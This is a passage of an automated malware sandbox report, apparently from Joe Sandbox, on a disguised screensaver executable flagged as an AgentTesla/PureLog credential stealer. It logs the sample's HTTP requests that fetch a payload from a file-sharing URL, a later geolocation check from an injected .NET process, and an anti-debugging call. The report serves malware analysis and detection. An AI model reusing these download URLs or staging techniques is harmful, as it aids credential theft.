                          Jul 3, 2024 18:08:12.935437918 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.935481071 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.936292887 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.936311007 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.936359882 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.672188997 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.672276974 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.672797918 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.672821999 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.672961950 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.672969103 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.673142910 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.673358917 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.673378944 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.673419952 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.673428059 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.673455954 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.673475981 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.673826933 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.673847914 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.673909903 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.673917055 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.673959017 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.674283981 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.674303055 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.674592018 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.674598932 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.674650908 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.675493956 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.675513983 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.675630093 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.675637007 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.675688028 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.677781105 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.677802086 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.677866936 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.677875996 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.677917004 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.680179119 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.680200100 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.680263042 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.680270910 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.680310965 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.763264894 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.763289928 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.763432026 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.763447046 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.763499975 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.763912916 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.763943911 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.764000893 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.764009953 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.764065981 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.764112949 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.764133930 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.764194012 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.764199972 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.764250040 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.764941931 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.764964104 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.765028000 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.765036106 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.765088081 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.765327930 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.765350103 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.765398979 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.765407085 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.765418053 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.765446901 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.765492916 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.765558958 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.766052008 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:57.412853003 CEST4970580192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:57.681502104 CEST4971380192.168.2.8208.95.112.1
                          Jul 3, 2024 18:08:57.687458992 CEST8049713208.95.112.1192.168.2.8
                          Jul 3, 2024 18:08:57.687546968 CEST4971380192.168.2.8208.95.112.1
                          Jul 3, 2024 18:08:57.687819004 CEST4971380192.168.2.8208.95.112.1
                          Jul 3, 2024 18:08:57.693525076 CEST8049713208.95.112.1192.168.2.8
                          Jul 3, 2024 18:08:58.176054955 CEST8049713208.95.112.1192.168.2.8
                          Jul 3, 2024 18:08:58.225236893 CEST4971380192.168.2.8208.95.112.1
                          Jul 3, 2024 18:09:46.146994114 CEST8049713208.95.112.1192.168.2.8
                          Jul 3, 2024 18:09:46.147154093 CEST4971380192.168.2.8208.95.112.1
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Jul 3, 2024 18:08:08.410398960 CEST | 49651 | 53 | 192.168.2.8 | 1.1.1.1
                          Jul 3, 2024 18:08:08.423037052 CEST | 53 | 49651 | 1.1.1.1 | 192.168.2.8
                          Jul 3, 2024 18:08:10.677411079 CEST | 55868 | 53 | 192.168.2.8 | 1.1.1.1
                          Jul 3, 2024 18:08:10.689913988 CEST | 53 | 55868 | 1.1.1.1 | 192.168.2.8
                          Jul 3, 2024 18:08:57.666979074 CEST | 63808 | 53 | 192.168.2.8 | 1.1.1.1
                          Jul 3, 2024 18:08:57.674412012 CEST | 53 | 63808 | 1.1.1.1 | 192.168.2.8
                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                          Jul 3, 2024 18:08:08.410398960 CEST | 192.168.2.8 | 1.1.1.1 | 0xf56a | Standard query (0) | filetransfer.io | A (IP address) | IN (0x0001) | false
                          Jul 3, 2024 18:08:10.677411079 CEST | 192.168.2.8 | 1.1.1.1 | 0x61a8 | Standard query (0) | s21.filetransfer.io | A (IP address) | IN (0x0001) | false
                          Jul 3, 2024 18:08:57.666979074 CEST | 192.168.2.8 | 1.1.1.1 | 0xc25c | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                          Jul 3, 2024 18:08:08.423037052 CEST | 1.1.1.1 | 192.168.2.8 | 0xf56a | No error (0) | filetransfer.io |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                          Jul 3, 2024 18:08:08.423037052 CEST | 1.1.1.1 | 192.168.2.8 | 0xf56a | No error (0) | filetransfer.io |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                          Jul 3, 2024 18:08:10.689913988 CEST | 1.1.1.1 | 192.168.2.8 | 0x61a8 | No error (0) | s21.filetransfer.io |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                          Jul 3, 2024 18:08:10.689913988 CEST | 1.1.1.1 | 192.168.2.8 | 0x61a8 | No error (0) | s21.filetransfer.io |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                          Jul 3, 2024 18:08:57.674412012 CEST | 1.1.1.1 | 192.168.2.8 | 0xc25c | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                          • filetransfer.io
                          • s21.filetransfer.io
                          • ip-api.com
                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          0 | 192.168.2.8 | 49705 | 188.114.96.3 | 80 | 7612 | C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 3, 2024 18:08:08.438275099 CEST | 95 | OUT | GET /data-package/btd2ptah/download HTTP/1.1
                          Host: filetransfer.io
                          Connection: Keep-Alive
                          Jul 3, 2024 18:08:09.095911026 CEST | 816 | IN | HTTP/1.1 301 Moved Permanently
                          Date: Wed, 03 Jul 2024 16:08:09 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Location: https://filetransfer.io/data-package/btd2ptah/download
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=skvXQPBLvPLXZx8KmTCvuNTLX4t93RIwOsSFS98bIk0B3HqW61h8Y56rNuWJzRAxsnqPpCP3FV8i6s570Usl%2FGyUP4hsXFH8NXJycx1o5ORR4%2BD80fvutM3NPdX6C9DoPi4%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 89d821ef492d7ca2-EWR
                          alt-svc: h3=":443"; ma=86400
                          Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          1 | 192.168.2.8 | 49713 | 208.95.112.1 | 80 | 5584 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 3, 2024 18:08:57.687819004 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                          Host: ip-api.com
                          Connection: Keep-Alive
                          Jul 3, 2024 18:08:58.176054955 CEST | 175 | IN | HTTP/1.1 200 OK
                          Date: Wed, 03 Jul 2024 16:08:57 GMT
                          Content-Type: text/plain; charset=utf-8
                          Content-Length: 6
                          Access-Control-Allow-Origin: *
                          X-Ttl: 33
                          X-Rl: 42
                          Data Raw: 66 61 6c 73 65 0a
                          Data Ascii: false


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          0 | 192.168.2.8 | 49706 | 188.114.96.3 | 443 | 7612 | C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-07-03 16:08:09 UTC | 95 | OUT | GET /data-package/btd2ptah/download HTTP/1.1
                          Host: filetransfer.io
                          Connection: Keep-Alive
                          2024-07-03 16:08:10 UTC | 1055 | IN | HTTP/1.1 302 Found
                          Date: Wed, 03 Jul 2024 16:08:10 GMT
                          Content-Type: text/html; charset=utf-8
                          Transfer-Encoding: chunked
                          Connection: close
                          X-Powered-By: Nette Framework 3
                          X-Frame-Options: SAMEORIGIN
                          Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly
                          Set-Cookie: PHPSESSID=ca6te0j24gbgu6n6hlqe7vvknl; expires=Wed, 17-Jul-2024 16:08:08 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                          Vary: X-Requested-With
                          Location: https://s21.filetransfer.io/storage/download/FiMxpnoPTxVw
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qbk8uR8s2IAsLI4vSlt8ZfI6piNqwKdstAKBjnapKoA6H5Yp5%2FU7up848%2Fp7qIek3Lo4izNN6qppBbHWZwQ%2BX2oz5N8eh1npH2DWoGexDsJ%2FmmW1YCnoZIhyKwSNObol0lg%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 89d821f63ca87cb1-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-07-03 16:08:10 UTC134INData Raw: 38 30 0d 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 0a 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 31 2e 66 69 6c 65 74 72 61 6e 73 66 65 72 2e 69 6f 2f 73 74 6f 72 61 67 65 2f 64 6f 77 6e 6c 6f 61 64 2f 46 69 4d 78 70 6e 6f 50 54 78 56 77 22 3e 50 6c 65 61 73 65 20 63 6c 69 63 6b 20 68 65 72 65 20 74 6f 20 63 6f 6e 74 69 6e 75 65 3c 2f 61 3e 2e 3c 2f 70 3e 0d 0a
                          Data Ascii: 80<h1>Redirect</h1><p><a href="https://s21.filetransfer.io/storage/download/FiMxpnoPTxVw">Please click here to continue</a>.</p>
                          2024-07-03 16:08:10 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          1 | 192.168.2.8 | 49707 | 188.114.96.3 | 443 | 7612 | C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-07-03 16:08:11 UTC | 98 | OUT | GET /storage/download/FiMxpnoPTxVw HTTP/1.1
                          Host: s21.filetransfer.io
                          Connection: Keep-Alive
                          2024-07-03 16:08:12 UTC | 1065 | IN | HTTP/1.1 200 OK
                          Date: Wed, 03 Jul 2024 16:08:11 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 2261000
                          Connection: close
                          Last-Modified: Tue, 02 Jul 2024 09:00:30 GMT
                          Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly
                          Set-Cookie: PHPSESSID=e021f8dcdea1c14f18e9f01cb6ff925b; expires=Wed, 17-Jul-2024 16:08:11 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Content-Disposition: attachment; filename="Vceszwqjme.dat"
                          Accept-Ranges: bytes
                          Accept-Ranges: bytes
                          ETag: "6683c1ae-228008"
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZasvEHxvw2QwEqjl6ogA8%2FAmRTJXf%2BRgDOnSMXOkYfBES%2BIAJA8sGqvzAQ9nkwW0QIJhgSYRs%2Fch5BcHCD%2FqNYRgBILbRQ5nP2Ums%2FkG%2Bc2zIQTWaXX65jvokhIvYjmvrVn0e4FR"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 89d821fe5f138c71-EWR
                          alt-svc: h3=":443"; ma=86400

                          Target ID:0
                          Start time:12:08:07
                          Start date:03/07/2024
                          Path:C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe"
                          Imagebase:0xb50000
                          File size:968'192 bytes
                          MD5 hash:F0A33BC19A7EDFA50259138CEAE8C2EF
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1940288788.00000000080E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1917437133.000000000346B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1917437133.000000000346B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1928437067.0000000007156000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1928437067.0000000007156000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1917437133.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1935701482.0000000007B20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1928437067.00000000069D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1928437067.00000000069D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1919160150.0000000004A01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:6
                          Start time:12:08:56
                          Start date:03/07/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                          Imagebase:0xa70000
                          File size:56'368 bytes
                          MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2681049301.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2681049301.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2683739560.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:moderate
                          Has exited:false

                            Execution Graph

                            Execution Coverage:14.3%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:21.9%
                            Total number of Nodes:389
                            Total number of Limit Nodes:37
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4
                            • API String ID: 0-4088798008
                            • Opcode ID: c5889140279ca85607659debb3bcdfbecc3d4a81282b59ef3b32b059c0996610
                            • Instruction ID: f028a47a2a019bc6e5225a1ac0a595440c504a9b6c8316a23cc3649a2a0f9055
                            • Opcode Fuzzy Hash: c5889140279ca85607659debb3bcdfbecc3d4a81282b59ef3b32b059c0996610
                            • Instruction Fuzzy Hash: 8DB2F734A00218CFDB54CFA4C994BADB7B5BB48705F1581A9E605AB3A9DB70EC81CF54
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4
                            • API String ID: 0-4088798008
                            • Opcode ID: 62ecb73884364161cc19946fce02f4f1fc5f7d1e8741a97390d4615356e4fb86
                            • Instruction ID: f017e0e4d3b28ff766ed6b6193b96ccadfc2c2b5a586f5cb3828346177250be3
                            • Opcode Fuzzy Hash: 62ecb73884364161cc19946fce02f4f1fc5f7d1e8741a97390d4615356e4fb86
                            • Instruction Fuzzy Hash: CD220A34A00218CFDB64CFA4C994BA9B7B5FF48305F1581A9EA09AB396DB70DD81CF54

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 790 2db89f0-2db8a74 CheckRemoteDebuggerPresent 793 2db8a7d-2db8ac0 790->793 794 2db8a76-2db8a7c 790->794 794->793
                            APIs
                            • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 02DB8A67
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID: CheckDebuggerPresentRemote
                            • String ID:
                            • API String ID: 3662101638-0
                            • Opcode ID: ae02c7acbb4dc03ef897388ae949ab28d82459c63bf4b9b2b875facc57fb4110
                            • Instruction ID: 6ffad671fc84373bd62f52483d091a856248cffb3507cfa8b64f4b9285f440b2
                            • Opcode Fuzzy Hash: ae02c7acbb4dc03ef897388ae949ab28d82459c63bf4b9b2b875facc57fb4110
                            • Instruction Fuzzy Hash: 03215C72900349CFDB14CFAAC444BEEBBF5AF48320F14842AD455A7240C7389A44DFA0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917011557.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: L+8^
                            • API String ID: 0-1607618960
                            • Opcode ID: 20f2da8b2228d0d3b17d6937c85415038821b7d9355c46c515598e7c841caca6
                            • Instruction ID: 3bd4a8adfcb1e1b3d87af4b1577dd220fb7db122518f2de43aa5326e24c38fec
                            • Opcode Fuzzy Hash: 20f2da8b2228d0d3b17d6937c85415038821b7d9355c46c515598e7c841caca6
                            • Instruction Fuzzy Hash: 52C16A30A0420ACFD721CF59D5847AAB7F2FB81318F14C6BAC4559BA59E338BA85CF51
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: \V!m
                            • API String ID: 0-1999779074
                            • Opcode ID: b716bfff0e400df99eb5bfa5cc377ece421a5d26f8e132e8e41d70207c92e3ee
                            • Instruction ID: 28f8359d0de92c586c743e57963d16af3304f4668ba86d4172d901c11789986d
                            • Opcode Fuzzy Hash: b716bfff0e400df99eb5bfa5cc377ece421a5d26f8e132e8e41d70207c92e3ee
                            • Instruction Fuzzy Hash: 2DB13D70E00249CFDB15CFA9C8957EEBBF2AF88718F14812AD816A7354EB749C45CB91
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d42d12cbcaf3ed7fc0a0e77045fdb3052d70d999126834bb44dee5339064c940
                            • Instruction ID: 09ced9fd47e4e9f3cd7bb383bcaa949bfd76f86ddfcca609ad0819ab15b536b5
                            • Opcode Fuzzy Hash: d42d12cbcaf3ed7fc0a0e77045fdb3052d70d999126834bb44dee5339064c940
                            • Instruction Fuzzy Hash: 8AB13D70E10209CFDB11CFA9D8957EDBBF2AF88718F14812AD816A7394EB759845CF81
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1c169857f53a3902d8e575e07db26d741bfbbadf3b0e4bf855547cafcdd2288d
                            • Instruction ID: 560bde4c2ba35c3c699ccb1b6e4edccd513dc2b728cfdb5f42ab370862dfdf81
                            • Opcode Fuzzy Hash: 1c169857f53a3902d8e575e07db26d741bfbbadf3b0e4bf855547cafcdd2288d
                            • Instruction Fuzzy Hash: C2C1D074E01618CFDB64CFA9D884BADBBB2FB89304F6091A9D459A7354DB386D85CF00
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917223338.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2dd0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 015726e023da925ca8f7ebc1d04d1900eeece3078f8b7e9e1d3485b69d01eca1
                            • Instruction ID: 75479be4b593435078bdf8c65bf1137a3d5c7f54023e8923162843f6f0ba313b
                            • Opcode Fuzzy Hash: 015726e023da925ca8f7ebc1d04d1900eeece3078f8b7e9e1d3485b69d01eca1
                            • Instruction Fuzzy Hash: 80B1C174E05618CFDB24CFA9D884BADBBB2FB89304F6091A9D419A7354DB386D85CF40
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3d7f2cc5601ba1fba23f3a0a0ee0676707683f38d0ef1938f35bb6c905205d8f
                            • Instruction ID: 486b40cb33bac8320b9f617ab1db40ba1c11a5e9d4460a749123bdd6ce05f5b8
                            • Opcode Fuzzy Hash: 3d7f2cc5601ba1fba23f3a0a0ee0676707683f38d0ef1938f35bb6c905205d8f
                            • Instruction Fuzzy Hash: 38A13671D05208CFDB15CFAAD468BECBBF5AF49304F04902AD89AA7360D7798A85CF01
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917165729.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2db0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
